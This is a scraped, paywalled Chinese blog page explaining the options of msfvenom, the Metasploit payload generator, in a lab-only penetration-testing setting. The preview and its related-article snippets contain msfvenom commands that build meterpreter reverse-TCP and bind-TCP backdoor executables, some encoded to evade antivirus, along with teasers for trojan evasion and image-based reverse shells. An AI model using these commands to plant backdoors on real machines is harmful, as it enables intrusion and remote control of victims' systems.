msfvenom-shll生成工具是msf 组件——Metasploit(MSF)使用详解

VIP文章 已于 2022-04-24 11:42:14 修改
阅读量2.2k 收藏 1
点赞数
分类专栏: 笔记 网络安全 文章标签: web安全 渗透测试 安全
于 2022-04-22 10:24:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42096378/article/details/124328660
版权

未经授权禁止任何渗透测试 本次实验都是在本机虚拟机

抽离 专职生成对应的payload

常见参数

-l, --list 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops,…all

-p, --payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的

-f, --format < format> 指定输出格式

-e, --encoder 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload

-a, --arch < architecture> 指定payload的目标架构,例如x86 还是 x64 还是 x86_64

-o, --out < path> 指定创建好的payload的存放位置

-b, --bad-chars < list> 设定规避字符集,指定需要过滤的坏字符。例如:不使用 ‘\x0f’、‘\x00’

-n, --nopsled < length> 为payload预先指定一个NOP滑动长度

-s, --space < length> 设定有效攻击荷载的最大长度,就是文件大小

-i, --iterations < count> 指定payload的编码次数

-c, --add-code < path> 指定一个附加的win32 shellcode文件

-x, --template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中

-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行

-v, --var-name < value> 指定一个自定义的变量,以确定输出格式

-t, --timeout 从stdin读取有效负载时等待的秒数(默认为30,0表示禁用)

-h,–help 查看帮助选项

–platform < platform> 指定payload的目标平台

抽离 专职生成对应的payload
在这里插入图片描述
在这里插入图片描述

异或 编码 免杀
在这里插入图片描述

msfvenom -l platforms 支持平台
在这里插入图片描述
在这里插入图片描述

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport
最低0.47元/天 解锁文章
嗯光
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python之使用adb shell命令启动应用的方法详解
09-19
今天小编就为大家分享一篇Python之使用adb shell命令启动应用的方法详解,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
msfvenome木马生成的实战及其文档翻译(kali-01)
进击的小小白
05-31 2573
MSFVENOM(1) Metasploit Framework - msfvenom MSFVENOM(1) NAME msfvenom - Payload Generator and Encoder SYNOPSIS msfvenom [options] <var=val> DESCRIPT...
MSF(Metasploit Framework)详细介绍及用法【新手篇】
最新发布
h1008685的博客
04-04 1843
MSF核心组件介绍,MSF常用模块介绍【exploit,payload,auxiliary,post-exploitation,encoder,nops,evasion】基础命令【启动msf,数据库管理,查找和使用模块,配置模块,执行模块 ,会话管理,辅助命令,系统命令】MSf初始配置【初始化数据库,创建/切换/删除工作区,扫描数据,查看扫描结果】
渗透测试工具篇之MetasploitMSF)框架介绍与基本命令
lzp_5257的博客
04-22 5292
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 前言 我们能够通过它发现漏洞并进行快速实施攻击 MetasploitMSF)是一个免费的、可下载的框架,通过它可以很容易的获取、开发并且对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 一、MSF常用模块 Auxiliary 辅助模块:为渗透测试信息搜索提供了大量的辅助模块支持。 Exploits 攻击模块:利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,从而获得对远程目标系统访问权的代码组件。 Paylo.
教你制作一个木马免杀的360
EdisonJH的博客
03-17 3604
制作一个360免杀的木马 我们用到工具: kail:利用msfvenom (美少妇) MSFvenom 的常用命令 1、我们进入到msf里面 在msf生成一个exe的木马文件,这-p 就是生成window 模块playload、-e x86平台 -i 编码5ci ihost:你的ip iport你的端口 、-f 生成的exe文件,>名字就是shell.exe msfvenom -p wi...
Metasploit简介以及msf模块简介
weixin_61862241的博客
05-05 675
Metasploit简介以及msf模块简介
MSF 详解
m0_72125469的博客
05-19 4270
The Metasploit Framework 的简称。MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试msfvenommsfpayload和msfencode的组合。将这两个工具集成在一个框架实例中。
msf编码免杀
m0_61506558的博客
09-03 2410
自编码处理自捆绑+编码多重编码接口下载式签名伪装式
運行shell script 文件_利用自拍照反弹shell
weixin_39750598的博客
11-19 137
文章来源:洛米唯熊0x00:前言继前面讲到的用(看我如何利用微信反弹shell)之后,引来了很多人的围观。确实,新颖的利用方式。很有利用价值!闲话少说。今天,利用奇思妙想的方法来反弹shell。用一张自拍照。0x01:过程利用工具:https://github.com/peewpw/Invoke-PSImage一、首先利用msf创建一个ps1脚本代码:msfvenom -p window...
Shll基础
01-09
文章目录一、Shell简介二、Shell变量...(1)变量名称通常是大写字母,它可以由数字、字母(大小写)和下划线_组成,不能使用-。变量名区分大小写;但是不能以数字开头,中间不能有空格,也不能使用标点符号等。 (2)
linux内核,shll功能及其原理介绍.rar
10-15
linux内核,shll功能及其原理介绍.rarlinux内核,shll功能及其原理介绍.rarlinux内核,shll功能及其原理介绍.rarlinux内核,shll功能及其原理介绍.rar
shll编程基础Linux进阶
03-20
shll编程基础Linux进阶
msf反弹木马之免杀
satasun的博客
04-10 2230
原理 利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。 准备 win7靶机 ip :192.168.56.130 kali攻击机 ip: 192.168.56.135 ##实战开始 1.打开kali机,在命令行输入: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192...
提权 - Windows 令牌窃取/进程注入提权
acepanhuan的博客
03-01 476
提权 - Windows 令牌窃取/进程注入提权
工具使用】——Metasploit(MSF)使用详解(超详细)
热门推荐
weixin_45588247的博客
08-12 8万+
文章目录01Metasploit使用一、简介:二、Metasploit的安装和更新升级:1. 一键安装MSF:2. MSF的更新升级:三、使用方法:1. 基础使用:2. `MSF`中加载自定义的`exploit模块`:3. 漏洞利用(exploit):4. 攻击载荷(payload):4.1 payload模块路径::4.2 Metasploit中的 Payload 模块主要有以下三种类型:5. Meterpreter:5.1 Meterpreter是如何工作的?:5.2 Meterpreter的特点:6.
msf之正向shell的使用
shy的博客
09-28 8333
场景:经常使用msf生成后门文件获取shell,但是经常使用的都是反弹shell,reverse_tcp。突然之间遇到了一个场景,由于目标服务器不能出网,只能使用正向shell,这时才发现,自己对于正向shell,一无所知。 1,生成正向shell后门文件 msfvenom -p windows/meterpreter/bind_tcp -f exe -o shy.exe 2,上传到目标机器上 3.配置监听(很重要) 4,运行目标机上的后门文件,获取shell 1,2是正向sh.
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 864
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
Linux shll
12-01
Linux shell是一个命令行解释器,它是用户与Linux内核之间的接口。用户可以通过shell输入命令,shell将命令翻译成操作系统能够识别的语言并执行。Linux系统中常用的shell有Bash、Zsh、Ksh等。其中,Bash是最常用的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值